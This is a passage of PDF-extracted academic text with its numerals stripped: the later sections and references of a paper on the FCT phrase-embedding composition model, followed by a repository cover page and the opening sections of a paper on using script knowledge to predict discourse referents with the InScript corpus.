used the xxl set and removed du- plicate pairs. we used the most accurate pairs for development ( , pairs) and test ( , pairs); the remaining , pairs were used for training. as before, we rely on negative sampling to effi- ciently compute the objective during training. for each source/target n-gram pair, we sample negative noun phrases as outputs. both the target phrase and the negative phrases are transformed to their phrase embeddings with the current parameters. we then compute inner products between embedding of the source phrase and these output embeddings, and up- date the parameters according to the nce objective. we use the same feature templates as in table . notice that the xxl set contains several subsets (e.g., m, l ,xl) ranked by accuracy. in the experi- ments we also investigate their performance on dev data. unless otherwise specified, the full set is se- lected (performs best on dev set) for training. baselines we compare to the common and ef- fective point-wise addition (sum) method (mitchell and lapata, ). we additionally include weighted sum, which learns overall dimension specific weights from task-specific training, the equivalent of fct with αjk= and bij learned from data. furthermore, we compare to dataset specific mitchell and lapata ( ) also show success with point- wise product (multi) for vsms. however, multi is ill-suited to word embeddings and gave poor results in all our experi- ments. mikolov et al. ( b) show that sum of embeddings is related to product of context distributions because of the loga- rithmic computation in the output layer. baselines: we re-implemented the recursive neural network model (rnn) (socher et al., a) and the dual vsm algorithm in turney ( ) so that they can be trained on our dataset. we also include results for fine-tuning word embeddings in sum and weighted sum with task-spec objectives, which demonstrate improvements over the corre- sponding methods without fine-tuning. as before, word embeddings are pre-trained with word vec. rnns serve as another way to model the com- positionally of bigrams. we run an rnn on bi- grams and associated sub-trees, the same setting fct uses, and are trained on our task-spec objectives with the technique described in section . . as in socher et al. ( a), we refine the matrix w in eq. ( ) according to the pos tags of the component words. for example, for a bigram np like new/adj trial/nn, we use a matrix wadj−nn to transform the two word embeddings to the phrase embedding. in the experiments we have different matrices in total for bigram nps. the number is larger than that in socher et al. ( a) due to incorrect tags in au- tomatic parses. since the rnn model has time complexity o(n ), we compare rnns with different sized embeddings. the first one uses embeddings with dimensions, which has the same size as the embeddings used in socher et al. ( a), and has similar complexity to our model with dimension embeddings. the second model uses the same dimension embed- dings as our model but is significantly more compu- tationally expensive. for all models, we normalize the embeddings so that the l- norm equals , which is important in measuring semantic similarity via inner product. . results: bigram phrases ppdb our first task is to measure phrase simi- larity on ppdb. training uses the task-spec ob- we did not include results for a holistic model as in turney ( ), since most of the phrases (especially for those in ppdb) in our experiments are common phrases, making the vocabulary too large to train. one solution would be to only train holistic embeddings for phrases in the test data, but examination of a test set before training is not a realistic assumption. we do not compare the performance between using a single matrix and several matrices since, as discussed in socher et al. ( a), w s refined with pos tags work much better than using a single w . that also supports the argument in this paper, that it is important to determine the transformation with more features. ^ ^ ^ vocabulary sizes m r r o n t e s t s e t( % ) sum rnn rnn fct (a) mrr of models with fixed word embeddings ^ ^ ^ vocabulary sizes m r r o n t e s t s e t( % ) sum rnn rnn fct fct−pipeline fct−joint (b) mrr of models with fine-tuning figure : performance on ppdb task (test set). jective (eq. ( ) with nce training) where data are phrase-word pairs < a,b >. the goal is to select b from a set of candidates given a, where pair sim- ilarity is measured using inner product. we use can- didate sets of size k/ k/ k from the most fre- quent n words in nyt and report mean reciprocal rank (mrr). we report results with the baseline methods (sum, weighted sum, rnn). for fct we report training with the task-spec objective, the joint-objective (fct-j) and the pipeline approach (fct-p). to en- sure that the task-spec objective has a stronger in- fluence in fct-joint, we weighted each training in- stance of lm by . , which is equivalent to setting the learning rate of the lm objective equal to η/ and that of the task-spec objective as η. train- ing makes the same number of passes with the same learning rate as training with the task-spec objec- tive only. for each method we report results with and without fine-tuning the word embeddings on the labeled data. we run fct on the ppdb training data for epochs with learning rate η = . , which are both selected from development set. fig. shows the overall mrr results on differ- fine-tuning mrr model objective word emb @ k sum - - . sum task-spec y . wsum task-spec y . rnn task-spec n . rnn task-spec y . rnn task-spec n . rnn task-spec y . fct task-spec n . fct task-spec y . fct lm y . fct-p task-spec+lm y . fct-j task-spec+lm joint . table : performance on the ppdb task (test data). ent candidate vocabulary sizes ( k, k and k), and table highlights the results on the vocabulary using the top k words. overall, fct with task- spec training improves over all the baseline meth- ods in each setting. fine-tuning word embeddings improves all methods except rnn (d= ). we note that the rnn performs poorly, possibly because it uses a complex transformation from word em- bedding to phrase embeddings, making the learned transformation difficult to generalize well to new phrases and words when the task-specific labeled data is small. as a result, there is no guarantee of comparability between new pairs of phrases and word embeddings. the phrase embeddings may end up in a different part of the subspace from the word embeddings. comparing to sum and weighted sum, fct is capable of using features providing critical con- textual information, which is the source of fct’s improvement. additionally, since the rnns also used pos tags and parsing information yet achieved lower scores than fct, our results show that fct more effectively uses these features. to better show this advantage, we train fct models with only pos tag features, which achieve . / . on mrr@ k with/without fine-tuning word embed- dings, still better than rnns. see section . for a full ablation study of features in table . semi-supervised results: table also high- lighted the improvement from semi-supervised learning. first, the fully unsupervised method (lm) improves over sum, showing that improvements in language modeling carry over to semantic similar- ity tasks. this correlation between the lm ob- jective and the target task ensures the success of semi-supervised training. as a result, both semi- supervised methods, fct-j and fct-p improves over the supervised methods; and fct-j achieves the best results of all methods, including fct-p. this demonstrates the effectiveness of including large amounts of unlabeled data while learning with a task-spec objective. we believe that by adding the lm objective, we can propagate the semantic in- formation of embeddings to the words that do not appear in the labeled data (see the differences be- tween vocabulary sizes in table ). the improvement of fct-j over fct-p also in- dicates that the joint training strategy can be more effective than the traditional pipeline-based pre- training. as discussed in section . , the pipeline method, although commonly used in deep learning literatures, does not suit nlp applications well be- cause of the sparsity in word embeddings. there- fore, our results suggest an alternative solution to a wide range of nlp problems where labeled data has low coverage of the vocabulary. for future work, we will further investigate the idea of joint training on more tasks and compare with the pipeline method. results on semeval and turney we evaluate the same methods on semeval and the turney - and -choice tasks, which both provide training and test splits. the same base- lines in the ppdb experiments, as well as the dual space method of turney ( ) and the recursive auto-encoder (rae) from socher et al. ( ) are used for comparison. since the tasks did not provide any development data, we used cross-validation ( folds) for tuning the parameters, and finally set the training epochs to be and η = . . for joint training, the weight of the lm objective is weighted by . (i.e. with a learning rate equal to . η) since the training sets for these two tasks are much smaller. for convenience, we also include results for dual space as reported in turney ( ), though they are not comparable here since turney ( ) used a much larger training set. table shows similar trends as ppdb. one dif- ference here is that rnns do better with dimen- fine-tuning semeval turney model objective word emb test acc ( ) acc ( ) mrr @ k sum - - . . . . sum task-spec y . . . . weighted sum task-spec y . . . . rnn (d= ) task-spec n . . . . rnn (d= ) task-spec y . . . . rnn (d= ) task-spec n . . . . rnn (d= ) task-spec y . . . . dual space - - . . . . dual space - - - . . - rae auto-encoder - . . . . fct task-spec n . . . . fct task-spec y . . . . fct lm - . . . . fct-p task-spec+lm y . . . . fct-j task-spec+lm joint . . . . table : performance on semeval and turney semantic similarity tasks. dual space : our reimple- mentation of the method in (turney, ). dual space : the result reported in turney ( ). rae is the recursive auto-encoder in (socher et al., ), which is trained with the reconstruction-based objective of auto-encoder. sional embeddings on semeval , though at a dimensionality with similar computational complex- ity to fct (d = ), fct improves. additionally, on the -choice task of turney , both the fct and the rnn models, either with or without fine- tuning word embeddings, significantly outperform sum, showing that both models capture the word or- der information. fine tuning gives smaller gains on rnns likely because the limited number of training examples is insufficient for the complex rnn model. the lm objective leads to improvements on all three tasks, while rae does not perform significantly bet- ter than random guessing. these results are perhaps attributable to the lack of assumptions in the objec- tive about the relations between word embeddings and phrase embeddings, making the learned phrase embeddings not comparable to word embeddings. . dimensionality and complexity a benefit of fct is that it is computationally effi- cient, allowing it to easily scale to embeddings of dimensions. by contrast, rnn models typi- cally use smaller sized embeddings (d = proved best in socher et al., a) and cannot scale up to large datasets when larger dimensionality embed- dings are used. for example, when training on the ppdb data, the fct with d = processes . instances per ms, while the rnn with the same di- mensionality processes . instance/ms. training an rnn with d = is of comparable speed to fct with d = . figure (a-b) shows the mrr on ppdb for k and k candidate sets for both the sum baseline and fct with a task-spec objective and full features, as compared to rnns with differ- ent sized embeddings. both fct and rnn use fine- tuned embeddings. with a small number of embed- ding dimensions, rnns achieve better results. how- ever, fct can scale to much higher dimensionality embeddings, which easily surpasses the results of rnns. this is especially important when learning a large number of embeddings: the -dimensional space may not be sufficient to capture the semantic diversity, as evidenced by the poor performance of rnns with lower dimensionality. similar trends observed on the ppdb data also appear on the tasks of turney and semeval . figure (c-f) shows the perfor- mances on these two tasks. on the turney task, the fct even outperforms the rnn model us- ing embeddings with the same dimensionality. one possible reason is due to overfitting of the more com- plex rnn models on these small training sets. fig- ure (d) shows that the performances of fct on the -choice task are less affected by the dimensions of embeddings. that is because the composition models can well handle the word order information, rnn rnn rnn dimension of embeddings m r r (% ) sum fct (a) mrr@ k on ppdb dev set dimension of embeddings m r r (% ) rnn rnn rnn sum fct (b) mrr@ k on ppdb dev set rnn rnn rnn dimension of embeddings a c c (% ) sum fct (c) accuracy on the -choice task in turney rnn rnn rnn dimension of embeddings a c c (% ) sum fct (d) accuracy on the -choice task in turney dimension of embeddings m r r (% ) rnn rnn sum fct (e) mrr@ k on turney rnn rnn rnn dimension of embeddings a c c (% ) sum fct (f) accuracy on the semeval figure : effects of embedding dimension on the semantic similarity tasks. the notations “rnn< d >” in the figures stand for the rnn models trained with d-dimensional embeddings. which is critical to solving the -choice task, with- out relying on too much semantic information from word embeddings themselves. figure (e) shows that when the dimensionality of embeddings is lower than , both fct and rnn do worse than the base- line. this is likely because in the case of low dimen- sionality, updating embeddings is likely to change the whole structure of embeddings of training words, making both the fine-tuned word embeddings and the learned phrase embeddings incomparable to the other words. the performance of rnn with - dimension embeddings is too low so it is omitted. . experiments on longer phrases so far our experiments have focused on bigram phrases. we now show that fct improves for longer n-gram phrases (table ). without fine-tuning, fct performs significantly better than the other models, showing that the model can better capture the con- text and annotation information related to phrase se- mantics with the help of rich features. with different amounts of training data, we found that wsum and fct both perform better when trained on the ppdb- train fine-tuning mrr model set word emb @ k @ k sum - n . . wsum l n . . fct l n . . sum xxl y . . wsum xxl y . . fct xxl y . . table : results on ppdb ngram-to-ngram task. l set, a more accurate subset of xxl with , phrase pairs. this can be viewed as a low resource setting, where there is limited data for fine-tuning word embeddings. with fine-tuning of word embeddings, fct still significantly beats the other models. all three methods get their best results on the full xxl set, likely because it contains more phrase pairs to al- leviate over fitting caused by fine-tuning word em- beddings. notice that fine-tuning greatly helps all the methods, including sum, indicating that this ngram-to-ngram task is still largely dominated feature set mrr @ k fct . -clus . -pos . -compound . -head . -distance . wsum . sum . table : ablation study on dev set of the ppdb ngram-to-ngram task (mrr @ k). by the quality of single word semantics. therefore, we expect larger gains from fct on tasks where sin- gle word embeddings are less important, such as re- lation extraction (long distance dependencies) and question understanding (intentions are largely de- pendent on interrogatives). finally, we demonstrate the efficacy of different features in fct (table ) with an ablation study (ta- ble ). word cluster features contribute most, be- cause the point-wise product between word embed- ding and its context word cluster representation is actually an approximation of the word-word inter- action, which is believed important for phrase com- positions. head features, though few, also make a big difference, reflecting the importance of syntactic information. compound features do not have much of an impact, possibly because the simpler features capture enough information. related work compositional semantic models aim to build distri- butional representations of a phrase from its compo- nent word representations. a traditional approach for composition is to form a point-wise combina- tion of single word representations with composi- tional operators either pre-defined (e.g. element- wise sum/multiplication) or learned from data (le and mikolov, ). however, these approaches ignore the inner structure of phrases, e.g. the or- der of words in a phrase and its syntactic tree, and the point-wise operations are usually less expressive. one solution is to apply a matrix transformation (possibly followed by a non-linear transformation) to the concatenation of component word represen- tations (zanzotto et al., ). for longer phrases, matrix multiplication can be applied recursively ac- cording to the associated syntactic trees (socher et al., ). however, because the input of the model is the concatenation of word representations, ma- trix transformations cannot capture interactions be- tween a word and its contexts, or between compo- nent words. there are three ways to restore these interac- tions: the first is to use word-specific/tensor trans- formations to force the interactions between com- ponent words in a phrase. in these methods, word- specific transformations, which are usually matri- ces, are learned for a subset of words according to their syntactic properties (e.g. pos tags) (baroni and zamparelli, ; socher et al., ; grefen- stette et al., ; erk, ). composition between a word in this subset and another word becomes the multiplication between the matrix associated with one word and the embedding of the other, produc- ing a new embedding for the phrase. using one tensor (not word-specific) to compose two embed- ding vectors (has not been tested on phrase similar- ity tasks) (bordes et al., ; socher et al., b) is a special case of this approach, where a “word- specific transformation matrix” is derived by multi- plying the tensor and the word embedding. addi- tionally, word-specific matrices can only capture the interaction between a word and one of its context words; others have considered extensions to multi- ple words (grefenstette et al., ; dinu and ba- roni, ). the primary drawback of these ap- proaches is the high computational complexity, lim- iting their usefulness for semantics (section . .) a second approach draws on the concept of con- textualization (erk and padó, ; dinu and lap- ata, ; thater et al., ), which sums embed- dings of multiple words in a linear combination. for example, cheung and penn ( ) apply contextu- alization to word compositions in a generative event extraction model. however, this is an indirect way to capture interactions (the transformations are still unaware of interactions between components), and thus has not been a popular choice for composition. the third approach is to refine word-independent compositional transformations with annotation fea- tures. fct falls under this approach. the primary advantage is that composition can rely on richer lin- guistic features from the context. while the em- beddings of component words still cannot interact, they can interact with other information (i.e. fea- tures) of their context words, and even the global features. recent research has created novel features based on combining word embeddings and contex- tual information (nguyen and grishman, ; roth and woodsend, ; kiros et al., ; yu et al., ; yu et al., ). yu et al. ( ) further pro- posed converting the contextual features into a hid- den layer called feature embeddings, which is sim- ilar to the α matrix in this paper. examples of ap- plications to phrase semantics include socher et al. ( a) and hermann and blunsom ( ), who en- hanced rnns by refining the transformation matri- ces with phrase types and ccg super tags. how- ever, these models are only able to use limited infor- mation (usually one property for each compositional transformation), whereas fct exploits multiple fea- tures. finally, our work is related to recent work on low-rank tensor approximations. when we use the phrase embedding ep in eq. ( ) to predict a label y, the score of y given phrase p will be s(y,p) = uty ep = ∑n i u t y (λi � ewi) in log-linear models, where uy is the parameter vector for y. this is equivalent to using a parameter tensor t to evaluate the score with s′(y,p) = ∑n i t × y× f(wi,p)× ewi , while forcing the tensor to have a low-rank form as t ≈ u⊗α⊗ew. here ×k indicates tensor mul- tiplication of the kth view, and ⊗ indicates matrix outer product (kolda and bader, ). from this point of view, our work is closely related to the dis- criminative training methods for low-rank tensors in nlp (cao and khudanpur, ; lei et al., ), while it can handle more complex ngram-to-ngram tasks, where the label y also has its embedding com- posed from basic word embeddings. therefore our model can capture the above work as special cases. moreover, we have a different method of decompos- ing the inputs, which results in views of lexical parts and non-lexical features. as we show in this paper, this input decomposition allows us to benefit from pre-trained word embeddings and feature weights. conclusion we have presented fct, a new composition model for deriving phrase embeddings from word embed- dings. compared to existing phrase composition models, fct is very efficient and can utilize high di- mensional word embeddings, which are crucial for semantic similarity tasks. we have demonstrated how fct can be utilized in a language modeling set- ting, as well as tuned with task-specific data. fine- tuning embeddings on task-specific data can further improve fct, but combining both lm and task- spec objectives yields the best results. we have demonstrated improvements on both language mod- eling and several semantic similarity tasks. our im- plementation and datasets are publicly available. while our results demonstrate improvements for longer phrases, we still only focus on flat phrase structures. in future work we plan to fct with the idea of recursively building representations. this would allow the utilization of hierarchical structure while restricting compositions to a small number of components. acknowledgments we thank matthew r. gormley for his input and anonymous reviewers for their comments. mo yu is supported by the china scholarship council and by nsfc . references marco baroni and roberto zamparelli. . nouns are vectors, adjectives are matrices: representing adjective-noun constructions in semantic space. in empirical methods in natural language processing (emnlp), pages – . yoshua bengio, réjean ducharme, pascal vincent, and christian janvin. . a neural probabilistic lan- guage model. the journal of machine learning re- search (jmlr), : – . antoine bordes, xavier glorot, jason weston, and yoshua bengio. . a semantic matching energy function for learning with multi-relational data. ma- chine learning, ( ): – . yuan cao and sanjeev khudanpur. . online learn- ing in tensor space. in association for computational linguistics (acl), pages – . jackie chi kit cheung and gerald penn. . prob- abilistic domain modelling with contextualized distri- butional semantic vectors. in association for compu- tational linguistics (acl), pages – . https://github.com/gorov/fct_phrasesim_tacl ronan collobert and jason weston. . a unified ar- chitecture for natural language processing: deep neu- ral networks with multitask learning. in international conference on machine learning (icml), pages – . ronan collobert. . deep learning for efficient dis- criminative parsing. in international conference on artificial intelligence and statistics (aistats), pages – . georgiana dinu and marco baroni. . how to make words with vectors: phrase generation in distributional semantics. in association for computational linguis- tics (acl), pages – . georgiana dinu and mirella lapata. . measuring distributional similarity in context. in empirical meth- ods in natural language processing (emnlp), pages – . katrin erk and sebastian padó. . a structured vector space model for word meaning in context. in empirical methods in natural language processing (emnlp), pages – . katrin erk. . towards a semantics for distributional representations. in international conference on com- putational semantics (iwcs ), pages – . juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in north american chapter of the associ- ation for computational linguistics (naacl), pages – . edward grefenstette, georgiana dinu, yao-zhong zhang, mehrnoosh sadrzadeh, and marco baroni. . multi-step regression learning for composi- tional distributional semantics. arxiv: . . karl moritz hermann and phil blunsom. . the role of syntax in vector space models of compositional se- mantics. in association for computational linguistics (acl), pages – . karl moritz hermann, dipanjan das, jason weston, and kuzman ganchev. . semantic frame identifi- cation with distributed word representations. in as- sociation for computational linguistics (acl), pages – . eric h huang, richard socher, christopher d manning, and andrew y ng. . improving word representa- tions via global context and multiple word prototypes. in association for computational linguistics (acl), pages – . ryan kiros, richard zemel, and ruslan r salakhutdinov. . a multiplicative model for learning distributed text-based attribute representations. in advances in neural information processing systems (nips), pages – . tamara g kolda and brett w bader. . ten- sor decompositions and applications. siam review, ( ): – . ioannis korkontzelos, torsten zesch, fabio massimo zanzotto, and chris biemann. . semeval- task : evaluating phrasal semantics. in joint con- ference on lexical and computational semantics (* sem), pages – . quoc v le and tomas mikolov. . distributed repre- sentations of sentences and documents. arxiv preprint arxiv: . . tao lei, yu xin, yuan zhang, regina barzilay, and tommi jaakkola. . low-rank tensors for scoring dependency structures. in association for computa- tional linguistics (acl), pages – . tomas mikolov, kai chen, greg corrado, and jeffrey dean. a. efficient estimation of word representa- tions in vector space. arxiv preprint arxiv: . . tomas mikolov, ilya sutskever, kai chen, greg corrado, and jeffrey dean. b. distributed representations of words and phrases and their compositionality. arxiv preprint arxiv: . . jeff mitchell and mirella lapata. . vector-based models of semantic composition. in association for computational linguistics (acl), pages – . jeff mitchell and mirella lapata. . composition in distributional models of semantics. cognitive science, ( ): – . courtney napoles, matthew gormley, and benjamin van durme. . annotated gigaword. in acl joint workshop on automatic knowledge base construction and web-scale knowledge extraction, pages – . thien huu nguyen and ralph grishman. . employ- ing word representations and regularization for domain adaptation of relation extraction. in association for computational linguistics (acl), pages – . robert parker, david graff, junbo kong, ke chen, and kazuaki maeda. . english gigaword fifth edition, june. linguistic data consortium, ldc t . michael roth and kristian woodsend. . compo- sition of word representations improves semantic role labelling. in empirical methods in natural language processing (emnlp), pages – . richard socher, christopher d manning, and andrew y ng. . learning continuous phrase representa- tions and syntactic parsing with recursive neural net- works. in nips workshop on deep learning and un- supervised feature learning, pages – . richard socher, jeffrey pennington, eric h huang, an- drew y ng, and christopher d manning. . semi- supervised recursive autoencoders for predicting sen- timent distributions. in empirical methods in natural language processing (emnlp), pages – . richard socher, brody huval, christopher d manning, and andrew y ng. . semantic compositionality through recursive matrix-vector spaces. in empirical methods in natural language processing (emnlp), pages – . richard socher, john bauer, christopher d. manning, and ng andrew y. a. parsing with compositional vector grammars. in association for computational linguistics (acl), pages – . richard socher, alex perelygin, jean wu, jason chuang, christopher d. manning, andrew ng, and christo- pher potts. b. recursive deep models for se- mantic compositionality over a sentiment treebank. in empirical methods in natural language processing (emnlp), pages – . stefan thater, hagen fürstenau, and manfred pinkal. . word meaning in context: a simple and ef- fective vector model. in international joint con- ference on natural language processing (ijcnlp), pages – . joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in association for compu- tational linguistics (acl), pages – . peter d turney. . domain and function: a dual-space model of semantic relations and compo- sitions. journal of artificial intelligence research (jair), : – . mo yu and mark dredze. . improving lexical em- beddings with semantic knowledge. in association for computational linguistics (acl), pages – . mo yu, matthew gormley, and mark dredze. . factor-based compositional embedding models. in nips workshop on learning semantics. mo yu, matthew r. gormley, and mark dredze. . combining word embeddings and feature embeddings for fine-grained relation extraction. in north american chapter of the association for computational linguis- tics (naacl). fabio massimo zanzotto, ioannis korkontzelos, francesca fallucchi, and suresh manandhar. . estimating linear models for compositional distri- butional semantics. in international conference on computational linguistics (coling), pages – . edinburgh research explorer modeling semantic expectation: using script knowledge for referent prediction citation for published version: modi, a, titov, i, demberg, v, sayeed, a & pinkal, m , 'modeling semantic expectation: using script knowledge for referent prediction', transactions of the association for computational linguistics, vol. , pp. - . <https://www.transacl.org/ojs/index.php/tacl/article/view/ > link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. https://www.transacl.org/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/modeling-semantic-expectation-using-script-knowledge-for-referent-prediction( c a - ee - b -af a- ac aad ).html modeling semantic expectation: using script knowledge for referent prediction ashutosh modi , ivan titov , vera demberg , asad sayeed , manfred pinkal , {ashutosh,vera,asayeed,pinkal}@coli.uni-saarland.de titov@uva.nl universität des saarlandes, germany illc, university of amsterdam, the netherlands abstract recent research in psycholinguistics has pro- vided increasing evidence that humans predict upcoming content. prediction also affects per- ception and might be a key to robustness in human language processing. in this paper, we investigate the factors that affect human prediction by building a computational model that can predict upcoming discourse referents based on linguistic knowledge alone vs. lin- guistic knowledge jointly with common-sense knowledge in the form of scripts. we find that script knowledge significantly improves model estimates of human predictions. in a second study, we test the highly controversial hypothesis that predictability influences refer- ring expression type but do not find evidence for such an effect. introduction being able to anticipate upcoming content is a core property of human language processing (kutas et al., ; kuperberg and jaeger, ) that has re- ceived a lot of attention in the psycholinguistic liter- ature in recent years. expectations about upcoming words help humans comprehend language in noisy settings and deal with ungrammatical input. in this paper, we use a computational model to address the question of how different layers of knowledge (lin- guistic knowledge as well as common-sense knowl- edge) influence human anticipation. here we focus our attention on semantic pre- dictions of discourse referents for upcoming noun phrases. this task is particularly interesting because it allows us to separate the semantic task of antic- ipating an intended referent and the processing of the actual surface form. for example, in the con- text of i ordered a medium sirloin steak with fries. later, the waiter brought . . . , there is a strong ex- pectation of a specific discourse referent, i.e., the referent introduced by the object np of the preced- ing sentence, while the possible referring expression could be either the steak i had ordered, the steak, our food, or it. existing models of human predic- tion are usually formulated using the information- theoretic concept of surprisal. in recent work, how- ever, surprisal is usually not computed for drs, which represent the relevant semantic unit, but for the surface form of the referring expressions, even though there is an increasing amount of literature suggesting that human expectations at different lev- els of representation have separable effects on pre- diction and, as a consequence, that the modelling of only one level (the linguistic surface form) is in- sufficient (kuperberg and jaeger, ; kuperberg, ; zarcone et al., ). the present model ad- dresses this shortcoming by explicitly modelling and representing common-sense knowledge and concep- tually separating the semantic (discourse referent) and the surface level (referring expression) expec- tations. our discourse referent prediction task is related to the nlp task of coreference resolution, but it substantially differs from that task in the following ways: ) we use only the incrementally available left context, while coreference resolution uses the full text; ) coreference resolution tries to identify the dr for a given target np in context, while we look at the expectations of drs based only on the context transactions of the association for computational linguistics, vol. , pp. – , . action editor: hwee tou ng. submission batch: / revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. before the target np is seen. the distinction between referent prediction and prediction of referring expressions also allows us to study a closely related question in natural language generation: the choice of a type of referring expres- sion based on the predictability of the dr that is intended by the speaker. this part of our work is inspired by a referent guessing experiment by tily and piantadosi ( ), who showed that highly pre- dictable referents were more likely to be realized with a pronoun than unpredictable referents, which were more likely to be realized using a full np. the effect they observe is consistent with a gricean point of view, or the principle of uniform information den- sity (see section . ). however, tily and piantadosi do not provide a computational model for estimat- ing referent predictability. also, they do not include selectional preference or common-sense knowledge effects in their analysis. we believe that script knowledge, i.e., common- sense knowledge about everyday event sequences, represents a good starting point for modelling con- versational anticipation. this type of common-sense knowledge includes temporal structure which is par- ticularly relevant for anticipation in continuous lan- guage processing. furthermore, our approach can build on progress that has been made in recent years in methods for acquiring large-scale script knowl- edge; see section . . our hypothesis is that script knowledge may be a significant factor in human an- ticipation of discourse referents. explicitly mod- elling this knowledge will thus allow us to produce more human-like predictions. script knowledge enables our model to generate anticipations about discourse referents that have al- ready been mentioned in the text, as well as anticipa- tions about textually new discourse referents which have been activated due to script knowledge. by modelling event sequences and event participants, our model captures many more long-range depen- dencies than normal language models are able to. as an example, consider the following two alternative text passages: we got seated, and had to wait for minutes. then, the waiter brought the ... we ordered, and had to wait for minutes. then, the waiter brought the ... preferred candidate referents for the object posi- tion of the waiter brought the ... are instances of the food, menu, or bill participant types. in the con- text of the alternative preceding sentences, there is a strong expectation of instances of a menu and a food participant, respectively. this paper represents foundational research in- vestigating human language processing. however, it also has the potential for application in assistant technology and embodied agents. the goal is to achieve human-level language comprehension in re- alistic settings, and in particular to achieve robust- ness in the face of errors or noise. explicitly mod- elling expectations that are driven by common-sense knowledge is an important step in this direction. in order to be able to investigate the influence of script knowledge on discourse referent expecta- tions, we use a corpus that contains frequent refer- ence to script knowledge, and provides annotations for coreference information, script events and par- ticipants (section ). in section , we present a large-scale experiment for empirically assessing hu- man expectations on upcoming referents, which al- lows us to quantify at what points in a text humans have very clear anticipations vs. when they do not. our goal is to model human expectations, even if they turn out to be incorrect in a specific instance. the experiment was conducted via mechanical turk and follows the methodology of tily and pianta- dosi ( ). in section , we describe our computa- tional model that represents script knowledge. the model is trained on the gold standard annotations of the corpus, because we assume that human compre- henders usually will have an analysis of the preced- ing discourse which closely corresponds to the gold standard. we compare the prediction accuracy of this model to human predictions, as well as to two baseline models in section . . one of them uses only structural linguistic features for predicting ref- erents; the other uses general script-independent se- lectional preference features. in section , we test whether surprisal (as estimated from human guesses vs. computational models) can predict the type of referring expression used in the original texts in the corpus (pronoun vs. full referring expression). this experiment also has wider implications with respect to the on-going discussion of whether the referring expression choice is dependent on predictability, as predicted by the uniform information density hy- (i)( )p bather [decided]e wash to take a (bath)( )p bath yesterday afternoon after working out . once (i)( )p bather got back home , (i)( )p bather [walked]e enter bathroom to (my)( )p bather (bathroom)( )p bathroom and first quickly scrubbed the (bathroom tub)( )p bathtub by [turning on]e turn water on the (water)( )p water and rinsing (it)( )p bathtub clean with a rag . after (i)( )p bather finished , (i)( )p bather [plugged]e close drain the (tub)( )p bathtub and began [filling]e fill water (it)( )p bathtub with warm (water)( )p water set at about (degrees)( )p temperature . figure : an excerpt from a story in the inscript corpus. the referring expressions are in parentheses, and the corresponding discourse referent label is given by the superscript. referring expressions of the same discourse referent have the same color and superscript number. script-relevant events are in square brackets and colored in orange. event type is indicated by the corresponding subscript. pothesis. the contributions of this paper consist of: • a large dataset of human expectations, in a va- riety of texts related to every-day activities. • an implementation of the conceptual distinction between the semantic level of referent predic- tion and the type of a referring expression. • a computational model which significantly im- proves modelling of human anticipations. • showing that script knowledge is a significant factor in human expectations. • testing the hypothesis of tily and piantadosi that the choice of the type of referring expres- sion (pronoun or full np) depends on the pre- dictability of the referent. . scripts scripts represent knowledge about typical event sequences (schank and abelson, ), for exam- ple the sequence of events happening when eating at a restaurant. script knowledge thereby includes events like order, bring and eat as well as partici- pants of those events, e.g., menu, waiter, food, guest. existing methods for acquiring script knowledge are based on extracting narrative chains from text (chambers and jurafsky, ; chambers and juraf- sky, ; jans et al., ; pichotta and mooney, ; rudinger et al., ; modi, ; ahrendt and demberg, ) or by eliciting script knowledge via crowdsourcing on mechanical turk (regneri et al., ; frermann et al., ; modi and titov, ). modelling anticipated events and participants is motivated by evidence showing that event repre- sentations in humans contain information not only about the current event, but also about previous and future states, that is, humans generate anticipa- tions about event sequences during normal language comprehension (schütz-bosbach and prinz, ). script knowledge representations have been shown to be useful in nlp applications for ambiguity reso- lution during reference resolution (rahman and ng, ). data: the inscript corpus ordinary texts, including narratives, encode script structure in a way that is too complex and too im- plicit at the same time to enable a systematic study of script-based expectation. they contain interleaved references to many different scripts, and they usually refer to single scripts in a point-wise fashion only, relying on the ability of the reader to infer the full event chain using their background knowledge. we use the inscript corpus (modi et al., ) to study the predictive effect of script knowledge. in- script is a crowdsourced corpus of simple narrative texts. participants were asked to write about a spe- cific activity (e.g., a restaurant visit, a bus ride, or a grocery shopping event) which they personally ex- perienced, and they were instructed to tell the story as if explaining the activity to a child. this resulted in stories that are centered around a specific scenario and that explicitly mention mundane details. thus, they generally realize longer event chains associated with a single script, which makes them particularly appropriate to our purpose. the inscript corpus is labelled with event-type, participant-type, and coreference information. full verbs are labeled with event type information, heads of all noun phrases with participant types, using scenario-specific lists of event types (such as enter bathroom, close drain and fill water for the “taking a bath” scenario) and participant types (such as bather, water and bathtub). on average, each template of- fers a choice of event types and participant (i)( ) decided to take a (bath)( ) yesterday afternoon after working out . once (i)( ) got back home , (i)( ) walked to (my)( ) (bathroom)( ) and first quickly scrubbed the (bathroom tub)( ) by turning on the (water)( ) and rinsing (it)( ) clean with a rag . af- ter (i)( ) finished , (i)( ) plugged xxxxxx figure : an illustration of the mechanical turk exper- iment for the referent cloze task. workers are supposed to guess the upcoming referent (indicated by xxxxxx above). they can either choose from the previously acti- vated referents, or they can write something new. dr_ (p_bathtub) the drain (new dr) dr_ (p_bather) n u m b e r o f w o rk e rs figure : response of workers corresponding to the story in fig. . workers guessed two already activated dis- course referents (dr) dr and dr . some of the workers also chose the “new” option and wrote different lexical variants of “bathtub drain”, a new dr correspond- ing to the participant type “the drain”. types. the inscript corpus consists of stories ad- dressing scenarios (about stories per scenario). the corpus has , words, , verb in- stances with event labels, and , head nouns with participant instances. modi et al. ( ) report an inter-annotator agreement of . for event types and . for participant types (fleiss’ kappa). we use gold-standard event- and participant-type annotation to study the influence of script knowl- edge on the expectation of discourse referents. in addition, inscript provides coreference annotation, which makes it possible to keep track of the men- tioned discourse referents at each point in the story. we use this information in the computational model of dr prediction and in the dr guessing experiment described in the next section. an example of an an- notated inscript story is shown in figure . referent 